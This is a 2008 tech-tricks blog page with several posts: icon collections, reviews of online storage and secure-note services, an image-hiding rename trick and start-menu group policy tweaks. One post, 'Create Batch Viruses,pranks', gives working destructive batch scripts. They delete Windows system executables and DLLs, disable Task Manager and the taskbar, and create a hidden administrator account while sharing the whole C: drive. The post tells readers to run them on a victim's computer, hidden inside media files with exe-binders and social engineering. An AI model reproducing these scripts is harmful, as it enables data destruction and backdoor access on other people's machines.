Friday, December 26, 2008

Tech Geek Tricks 2.0 [ h.A.c.K.e.D v.E.r.S.i.O.n]

 

You might have been reading Tech Geek Tricks or it might just be your 1st visit here ! you all 1137680369-2632 must be knowing about web 2.0,Which allows you to have more interactivity with the web site. So I thought of Creating t.g.t 2.0 with more high quality articles , Security tips , Hacking tricks ,Reviews ,Showcase of templates , graphics , Icons , Making money online , Blogging tips and tricks, Search engine optimization tricks and of course Web 2.0 sites.

 

Features that will be added ?

  • Including the topics mentioned above we will have-
  • A new web 2.0 look,
  • with web 2.0 tools
  • Will allow Guest post.

Why hacked version?

As mentioned above we will give you more of security stuffs and another reason is that  it is one of my Ambition to become a Computer Security Specialist. ;-)

 

When it will start?

January 1st -Till then read computer tricks tgt past articles and  Subscribe to the rss feed - So stay tuned.

[NO updates till Jan 1st ]

Wednesday, December 24, 2008

Free Blog icons collection

headerIf you have a blog or Web site  but don't have proper icons to attract visitors or make you site more attractive then you might be missing something. So see the free icons below and download them.

 

 email_me_by_Mayosoft           glossic

    Email me by ~Mayosoft - 11 icons               Free Aqua Gloss Icons Set of 32 Icons

 



Finance and Applications Icon Set stage

  On-Stage: Free Vector 49  Icon Set         Finance and Applications Icon Set 59 icons 

 

  sketchy_paper_icons_1_5  stickers

     Sketchy Paper Icon Set :: 20 Icons                        Stickers Icons :: 52 Icons

                                                

       Web 2.0rigami          Web browsers icon set

           Web 2.0rigami (One of my best)                       Web browsers icon set

 

   function_icons

 

          Function Icon Set,                                128 Completely Free Icons

 

 

 

  

Irish Icons Pack      gavatars

       Irish Icons Pack 26 icons                                Deziner Folio G-avatars   

 

merry_christmas_2009_icons_set_1_5   distortion_icons_set_1_5

   Merry Christmas Icon Set 12 icons                    Distortion Icon Set - 68 icons

 

Aeon  blogging-icons-set2

                     Aeon                                      Free Glossy Blogging Icons Set for Blogger's

 

aesthetica_version_2_1_5   balloonica_icons_set_1_5

      Aesthetica 2.0 Icon Set - 181 icons                Balloonica Icon Set - 80 icons

 

blossom_1_5   blue_velvet_1_5

        Blossom Icon Set - 52 icons                        Blue Velvet Icon Set - 86 icons

 

christmas_surprise_four_in_one_1_5  euro_2008_1_5

 Christmas Surprise (4 in 1) 49  Icon Set               EURO 2008 Icon Set - 20 icons

 

Free Hand Drawn Doodle Icon Set for Bloggers

 

          Free Hand Drawn

Doodle Icon Set for Bloggers

     

        (One of my favorites .)

 

 

 

  Free web development icons

 

 

 

 

        Free web development icons.

 

 

 

 

 

 

Liquidicity    Milky icon set

                         Liquidicity                                                  Milky icon set

 

OldSchool Icon Set          Phuzion

             OldSchool Icon Set                                                    Phuzion

 

           Pirates Theme icon collection                  Practika

           Pirates Theme icon collection                                     Practika

 

    ruby_extended_1_5   simplistica_preview

         Ruby Extended Icon Set - 238 icons               Simplistica Icon Set :: 25 Icons

 

  socialize_icons_set_1_5                                                                                       

 

 

 Socialize Icon Set - 12 icons

 

         [one of my favorites ]

 

 

    Turqua 3d Isometric Vector Icon Pack  

 

 

 

 

                   Turqua 3d

       Isometric Vector Icon Pack

 

 

 

 

 

 valentine_love_1_5 wysiwyg_sapphire_1_5

        Valentine Love Icon Set - 12 icons            WYSIWYG Sapphire Icon Set - 47 icons

 

I have tried by best to collect free blog icons, If you feel that I have missed some icons or want to showcase some icons or want to give feedback . Please do so by commenting bellow thanks.

Tuesday, December 23, 2008

Stickyscreen a new way to create sticky notes

stickyscreen Are you one of those who like to create sticky notes or do you want a service which lets you create sticky note in your browser, Then try Sticky Screen.

Features.

  • No Registrations.
  • No Submit button.
  • Free.

So head over to  Sticky Screen but note that You cannot type more than three lines and it takes help of cookies to store information. So if you clean your cookies the note will get deleted and will be replace by the default one.

 

Other notes

What made Jack Cheng make this service?

 

" I have a habit of putting sticky notes on the edge of my monitor. Usually these notes consist of mantras I come up with based on something I’ve learned or read recently. I have to change it up about once a week because if I get too used to seeing it, I start ignoring it. " - Jack Cheng

                                                                                                              See more info here.

firefox users can make it load on every new tab too, with the New Tab Homepage addon.

Monday, December 22, 2008

Store your files online with Livedrive

Ever wanted to store file online with Unlimited storage space . Then try live drivelivedrive(no not windows live drive)

 

About Livedrive 

Livedrive is creating technology that will revolutionize the way people store and access their files, photos, music, videos and other digital content.

Our vision is simple: don't store files on your PC; store them on your Livedrive instead. Livedrive is your personal storage space on the Internet. Its unlimited, it's secure and it's there forever.

Store it on Livedrive, access it anywhere
Works on your PC just like a normal hard drive or USB drive
See the same files on all your PCs
See all your files on your mobile, PDA or other devices
Access everything from the web
Share anything with just one click
No need to backup - everything on your Livedrive is stored securely

                                                                                                                                read more @about

Features

  • Unlimited storage space                                                                unlimitedstorage-star
  • See the same files on all your PCs, the Web and your mobile.
  • Works like a normal hard drive
  • Send files to anyone
  •          Send large documents, presentations and ZIP files to contacts and clients. Forget the hassle of emailing attachments

  • Livedrive is optimised for Apple iPhones
  • Work online - Office compatible
  • Works even when your PC is disconnected
  • Works with your favourite sites

                                                                                 More features can be found here

Saturday, December 20, 2008

Create Batch Viruses,pranks

batchvirus

Batch files can be used to create viruses pranks to irritate your friends or so let's begin by creating a batch virus.

 

Creating a Batch File.

 

This is my first batch file virus which will create unlimited folders inside a folder in desktop or my documents .

to create this file  open notepad and type



@echo off
cd C:\Documents and Settings\All Users\Desktop
:loop
md achute
cd achute
goto loop

and save it as virus.bat give it a .bat extension
_______________________________________________________
well this is a very simple prank to play with you friends,I hope you enjoy it.
I know this is not a good virus,prank. Then you might consider to see the next batch virus.

_______________________________________________________

This batch virus will delete contents of system folder making the computer not run.

@echo off
taskkill /f /im explorer.exe

del "%systemroot%\*.exe" /f /q /s /a h r s a

del "%systemroot%\system32\*exe" /f /q /s /a h r s a

del "%systemroot%\*.dll" /f /q /s /a h r s a

del "%systemroot%\system32\*dll" /f /q /s /a h r s a

msg * Your computer important files have been deleted

shutdown -r -t 100 -c "Computer files missing..hurray..I am so sorry to say that your computer has been infected ,My deep regrets for spoiling your computer ."

__________________________________________________________

Now this virus will disable run.search,help,all programs,disable taskbar and more.

__________________________________________________________

@echo off
COLOR FC
ECHO VIRUS ATTACK! BY ACHUTE
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000001 /f

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMHelp /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v LockTaskbar /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoPropertiesMyComputer /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall /v NoAddRemovePrograms /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall /v NoSupportInfo /t REG_DWORD /d 00000001 /f

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeCaption /d %Hacked!% /f

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeText /d %Your computer has been infected with a virus developed by a 14 yr old kid You will not be able to search,run use taskbar and so on enjoy to revove this virus visit www.techgeektricks.co.cc % /f

msg * YOUR COMPUTER has been  Crashed- God Save your computer.
msg * Say bye bye to your computer
msg * This virus is developed by a 14 year old kid

shutdown -r -t 100 -c "Virus detected Restarting..hurray..I am so sorry to say that your computer has been infected , To know what to do next see the message you see after booting."

____________________________________________________

The heal for the above virus is 

____________________________________________________

@echo off
ECHO VIRUS ATTACK- saver! BY ACHUTE
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000000 /f

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMHelp /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v LockTaskbar /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoPropertiesMyComputer /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall /v NoAddRemovePrograms /t REG_DWORD /d 00000000 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall /v NoSupportInfo /t REG_DWORD /d 00000000 /f

___________________________________________________

Other viruses

   @echo off
    cd\
    cd %SystemRoot%\system32\
    md 1001
    cd\
    cls

    rem N0 H4rm 15 cau53d unt1| N0w
    rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
    echo 12:00:00.00 | time >> nul
    echo 01/01/2000 | date >> nul

    net users Microsoft_support support /add
    rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

    rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
    net localgroup administrators  Microsoft_support /add

    rem 5h4r3 th3 R00t Dr1v3
    net share system=C:\ /UNLIMITED

    cd  %SystemRoot%\system32\1001
    echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs

    rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
    mode con rate=1 > nul
    mode con delay=4 >> nul

    rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y @ 12:01 and 12:02
    at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
    at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

    msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
    msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul

    rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
    copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs”

    rem *****************************************************************************************************
    rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y

    echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
    copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

    rem *****************************************************************************************************

    cd\
    cls
    rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
    cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
    attrib +h +s +r warnusr.vbs
    attrib +h +s +r sd.bat
    cd\
    cd %systemroot%\system32
    attrib +h +s +r 1001

    rem K1||5 th3 3xp|0r3r.3×3 Pr0c355
    taskkill /F /IM explorer.exe

    rem @ EOV // End of Virus

Copy the source code and paste it in a notepad, then save it with the .bat extension. Copy it in a Pen Drive, then execute it in the victims computer.

You can also use some exe-binders to bind this virus with any audio,video, text or what ever the files may be then use some social engineering technique to make the victim execute the file by himself to harm his computer.

You can create this virus with out using any third party tools in windows, also instead of exe-binder, you can use the iexpress wizard to create a custom package.

your Feedbacks are welcome….!

You can download this batch file here….
To rollback the changes that have been made by this virus, you can download the patch file here and execute it. Click here for Patch…

_______________________________________________________________________

The above virus was created by Technocrawl 1137686487-2633

 

/* Disclaimer :  We are not responsible for whatever you do with this.This is published, only as a review for educational means                                   */


Friday, December 19, 2008

Send secure Email the simplest way

Have you ever wanted to send secure e-mail but dint know how to do so or use encryption keys. logo

Then say bye bye to the older methods of sending encrypted e-mail.Welcome Send.™. It doesn't require the use of  encryption keys and other software's just a web browser will do.

Here is what they say about there service.

It's not that there aren't other secure methods to send an email… It's just that they're too hard to use.

We think everyone should be able to send a secure email…and we all have better things to do than spend an afternoon installing and configuring an encryption solution.

Before Send.™, the process of sending a secure email was complex as illustrated by the chart on the generic_flowright: 

But why subject yourself (and your recipients) to such an arduous process? And what happens if your recipients want you to use a different solution or the solution you used isn't compatible with their system?
Send.™ is Different…
We don't require you to maintain encryption keys.
Though we think the public/private key method works, we also think it was created for geek's and technicians.

Send.™ is compatible with all email solutions including web mail.
Anyone with a browser and an Internet connection can use Send.™ and, unlike other available solutions, Send.™ requires no software downloads or additional system configuration.

The service is easy to use.
We created Send.™ because the previous process for sending secure messages was too difficult. Our studies suggest that people will not send encrypted messages if the process is even marginally more difficult than normal. Simply put…security is important, but cannot impede productivity.

Send.™ is the only free and easy way to send a secure message.

You can read more here @about

 

If you are a new to all these then There must be certain questions floating in your head?

What is wrong with regular email?

With very few exceptions, email is both sent and stored in plain-text. This creates the potential of your email being read by a laptop thief, a hacker, or even a nosey IT professional. Sure, not every email you send contains sensitive information - and we don't encourage you to encrypt all of your email - but almost all of us from time to time need to send information that we need to make sure only the intended recipient is able to read… and that's where Send.™ comes in handy.

 

Why should I encrypt my email?

Anytime your email contains sensitive information your message should be encrypted. Some examples are:
Passwords / Social Security numbers
Financial Documents / Tax Returns
Proprietary Information
Designs & Strategic Plans
Wills & Testamentary Documents
Bank Account numbers, etc.
Additionally, local and federal governments are enacting consumer protection laws that require encrypted email communication with clients and customers. Some professional industries are specifically prohibited by law from sending confidential information over unencrypted email (Banks, Physicians, etc.)

 

Who can read the message once it is encrypted?

Once encrypted, only one person can read the message - your intended recipient. Even after the message is received by the intended recipient, the message is still secure. No other user of Send.™ can read the message. If the message is forwarded to another email address (or intercepted in transit) - only the original intended recipient can read it.

 

To send an e-mail click here

To see more Frequently Asked Questions click here

To see there about me page click here

Thursday, December 18, 2008

Hide your important images with dos

So you have a image precious image stored up in your computer and want to hide it from others then you might just like our way of hiding files using the dos only.

 

Requirements.

A image file.
A good text editor (notepad will do)
Dos

 

What it does


This trick will convert an image file into an not understandable file See the image for more details
beforehiding afterhiding

           BEFORE HIDING                                                       AFTER HIDING

How to do it.

If you have read my article of hiding your documents using notepad then,this trick will be easy to follow.In this article I will be showing you,how to hide images in a txt format or any other format and make the image undetectable. Are you ready - Let's begin.

first move your images to c drive.[Create a backup of your image i will not be responsible if it is lost.]
Click on start then on run then type cmd
now type cd\ [press enter]
now take note of your image name and extension lets say techgeektricks.jpj
now under cmd - command prompt
type 

ren techgeektricks.jpj techgeektricksjpj.txt           

[press enter]

Ren command on command prompt is used for renaming the files.Here techgeektricks in the file name
and jpj/txt is it's extension. I have named the out put file as  techgeektricksjpj so that while converting it back to image format it becomes easy.

Now go to the location where your image was located and try to view it.You will notice that the image has changed into a text file.

To get your image back is simple just go to ms dos prompt go to c drive an then type ren techgeektricksjpj.txt techgeektricks.jpj

 

Where to use it?

You can use it to send images to your friends computer hiding it from spying eyes or you can just keep it in your  computer I bet no one will ever find out what is inside those text files unless you tell them it is an image or so.

 

Extra notes.

You can change the .txt extension to .mp3 or any other extension.

If you change the code or fiddle with the code which you get when the image is changed to .txt extension then the image will be  lost forever.So be careful

If you want to send the image hidden as .txt file then you must attach the file itself if you give your friend the code (i.e .txt code) It will not work.

Friday, December 12, 2008

Send notes that will self destruct after being read.


Want to send some confidential information notes to someone but were afraid to do so because of crackers/hackers then try privnote a free service which allows you to send notes e-mail which will self destruct after being read.

"Have you ever wanted to send confidential information within your work environment, to family or friends, but were afraid to do so over the internet, because some malicious hacker could be spying on you?
Privnote is a free web based service that allows you to send top secret notes over the internet. It's fast, easy, and requires no password or user registrationat all.

Just write your note, and you'll get a link. Then you copy and paste that link into an email (or instant message) that you send to the person who you want to read the note. When that person clicks the link for the first time, it will see the note in her browser and the note will automatically self-destruct, which means no one (even that very same person) can read the note again. The link won't work anymore.You can optionally choose to be notified when your note is read by leaving your email and a reference for the note.
"
Read this more at privnote about page.

Go ahead and send your note
type your note here or visit their site.



Create a avatar for yourself-free


Don't want to show your real face photo in forums face book orkut then create a avatar for your self with doppelme.
Doppelme is a Free service to create dynamic avatar. I have tried it and found it interesting.
"
With DoppelMe you can create a cool graphical likeness of yourself, your friends, family or any group of people for use as an avatar in forums, instant messenger, blogs and almost anywhere else on the web.

It's free and there are no Flash, ActiveX controls, downloads or toolbars needed - just your browser and a few mouse clicks. That's it!
"


I took 10 minutes to create this avatar for my self,Here is a screen shot of the desktop when i was creating this avatar.


It is worth a click, go an get yourself a avatar.

Sunday, December 7, 2008

Changing the startmenu properties.

Tricks we are going to perform:-
  1. Remove the My Documents icon from the Start menu and its sub menus.
  2. Remove the search option from the start menu.
  3. Remove Run from start menu.
  4. Remove the My Pictures icon from the Start Menu.
  5. Prevent the opening of start menu and task bar properties.
  6. Lock the task bar permanently.
  7. Remove the balloon tips from start menu.
  8. Remove all programs list from start menu.
  9. Remove the User name(only the name) from the start menu.
  10. More.. tricks.
Are you ready.. I hope you will like this article....

Well,This all tricks can be used to play pranks on your friends computer or to in your own computer.

All the tricks require you to go to the Group policy Editor.
To go to group policy editor.

Click on start menu.
click on run.
Type gpedit.msc and press enter
you will see a Group policy editor window
Click/expand Administrative Templates in the left hand side of the window.
and then click on Start Menu and Task bar.
Note: For better editing, see that you are in the extended tab [you can find that on the bottom to the group policy editor].


Now let's begin with the tricks, All are easy.
1. Remove the My Documents icon from the Start menu and its sub menus.
  • Double click on remove My documents from the start menu. (the third setting.)
  • You will see it's properties with not configured button option selected.
  • Now select enable option click on apply and click on OK
(For better info click on Explain tab)
And see the change my documents has disappeared from the start menu.

2. Remove the search option from the start menu.

You might have seen/noticed that when some virus infects the computer the search option gets
disabled.Now without making a virus. You can remove the search opption from the start menu of your friends computer or yours without going into any complication of creating a virus.

After going to the group policy editor and expanding administrative template, to do that see above.
  • Double click on Remove search menu from Start menu.
  • You will see it's properties with not configured button option selected.
  • Now select enable option click on apply and click on OK
Your search menu option will be disabled.

3. Remove Run/help from start menu.

Want to scare your friends by disabling their run and help option from the start menu.
You can disable it in your own computer so that no one will use the run option to perform nasty tricks.
To remove help option.
  • Double click on Remove Help menu from the start menu.
  • You will see it's properties with not configured button option selected.
  • Now select enable option click on apply and click on OK.
To remove run option.
Double click on Remove Run menu from the Start menu.
And follow the i),ii) and iii) steps of the trick no 1.
Now to remove..
4. Remove the My Pictures icon from the Start Menu.
5. Prevent the opening of start menu and task bar properties.
6. Lock the task bar permanently.
7. Remove the balloon tips from start menu.

8. Remove all programs list from start menu.
9. Remove the User name(only the name) from the start menu.

10.More.. tricks.


I hope now that you have figured out what to do :-). So proceed and change
the Start menu and task bar the way you want it to be. But be sure to be in extended tab.
Note:To disable the changes you have made just select the not configured option.


I have taken a Screen shot of the start menu before performing the tricks 1-9 and After performing the tricks - enjoy.